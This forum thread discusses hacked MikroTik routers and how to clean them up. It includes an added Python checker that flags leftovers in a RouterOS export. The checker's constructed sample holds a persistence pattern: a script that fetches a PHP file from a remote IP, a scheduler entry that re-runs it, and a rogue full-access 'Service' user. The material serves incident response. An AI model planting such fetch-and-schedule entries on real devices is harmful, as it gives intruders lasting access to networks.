Just found all our routers are hacked. Hackers leave scripts behind that allow PHP. Passwords compromised? Not sure how the hacker got in since some routers have different passwords, so???
PHP is a seeding thing, right?
Check your logs and work backwards to undo the hacker's scripts, schedule, and firewall rules. The hacker also adds a new user called Service. Also enables SSH ports, etc.
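As an added example (not from this thread or from MikroTik), here is a small Python checker that walks a saved RouterOS `/export` and lists the leftovers the post above says to look for: an unexpected user account, scripts that fetch remote content, scheduler entries that re-run them, services switched on, and input-chain accept rules. The export text below is constructed for the demo; the only account name it treats as suspicious is "Service", as reported in the thread, and that set is an assumption you would extend for your own fleet.

```python
import re
import shlex

# Constructed sample of a RouterOS "/export" fragment showing the kind of
# leftovers described in the thread. Addresses and names are made up.
SAMPLE_EXPORT = """\
# constructed sample, not from a real router
/ip service
set ssh disabled=no port=22
set telnet disabled=yes
/system script
add name=update-script source="/tool fetch url=http://198.51.100.7/x.php mode=http dst-path=x.php"
/system scheduler
add interval=1d name=sched-update on-event=update-script start-time=startup
/user
add group=full name=Service
add group=full name=admin
/ip firewall filter
add action=accept chain=input dst-port=22 protocol=tcp
"""

# Assumption: the only account name the thread reports is "Service"; extend as needed.
SUSPICIOUS_USERS = {"service"}


def parse_export(text):
    """Turn an export into (section, command, positional args, {key: value}) tuples."""
    section, entries = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            section = line          # e.g. "/system scheduler"
            continue
        parts = shlex.split(line)   # keeps a quoted source="..." value as one token
        cmd, positional, kv = parts[0], [], {}
        for tok in parts[1:]:
            if "=" in tok:
                k, v = tok.split("=", 1)
                kv[k] = v
            else:
                positional.append(tok)   # e.g. the service name in "set ssh ..."
        entries.append((section, cmd, positional, kv))
    return entries


def find_indicators(text):
    """Return a list of (kind, detail) findings a defender should review by hand."""
    findings = []
    for section, cmd, pos, kv in parse_export(text):
        if section == "/user" and cmd == "add" and kv.get("name", "").lower() in SUSPICIOUS_USERS:
            findings.append(("user", f"{kv['name']} in group {kv.get('group')}"))
        elif section == "/system script" and cmd == "add":
            src = kv.get("source", "")
            if re.search(r"/tool fetch|https?://|\.php", src, re.I):
                findings.append(("script", f"{kv.get('name')} pulls remote content: {src}"))
        elif section == "/system scheduler" and cmd == "add":
            # every scheduler entry is worth a look: it is how a dropped script gets re-run
            findings.append(("scheduler", f"{kv.get('name')} runs '{kv.get('on-event')}' every {kv.get('interval')}"))
        elif section == "/ip service" and cmd == "set" and pos and kv.get("disabled") == "no":
            findings.append(("service", f"{pos[0]} enabled on port {kv.get('port', '?')}"))
        elif (section == "/ip firewall filter" and cmd == "add"
              and kv.get("chain") == "input" and kv.get("action") == "accept"):
            findings.append(("firewall", f"input accept for {kv.get('protocol')}/{kv.get('dst-port')}"))
    return findings


if __name__ == "__main__":
    for kind, detail in find_indicators(SAMPLE_EXPORT):
        print(f"[{kind}] {detail}")
```

Run it against the output of `/export` saved from each router and diff the findings against a known-good export from a clean device; the script only flags items for review, it does not remove anything, so the actual cleanup (or a netinstall) is still a manual decision.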
If you weren't running the latest RouterOS, you will have been compromised by various exploits; the safest way forward is netinstall (and change all passwords).
MikroTik now has a blog, blog.mikrotik.com, in which security matters are addressed.
When I look at the most recent posting, the advice is to upgrade to v6.38.5:
Upgrading to v6.38.5 or newer will remove the bad files, stop the infection and prevent anything similar in the future.
An earlier posting suggests updating to 6.40.8 and says that is the latest secure version of RouterOS.
I strongly advise having a fixed notice on the blog, linked to in every article. This notice should state, for bugfix/current/RC, the minimal recommended version of RouterOS.
I also would like to see a static notification at the top of the Winbox window showing the latest minimal recommended version of RouterOS. If the router accessed by Winbox runs a lower version of RouterOS than recommended, then display that recommendation in the title of every window opened inside Winbox.
Agree. What I also find funny is that they obviously do not log into the forum regularly; if they did, they would have known about these vulnerabilities. But as soon as they get hacked, they can't post fast enough on the forum.
As they say, "if it works, don't touch it, stupid!", so I'm not shocked at all. It's nice to stay up to date, but who will appreciate it? Nobody, really. But you can be sure that everybody will scream as loud as they can when an upgrade goes bad. It also depends on who the user/admin is. Someone like an ISP should manage, because it's their living. But some small company not dealing primarily with networks? Unlikely.
Change password after upgrade. If they got your password 6-12 months ago, they still have the password in their database. This is the second wave, when they use the password. Even if you have a new version now, they still have a database of passwords!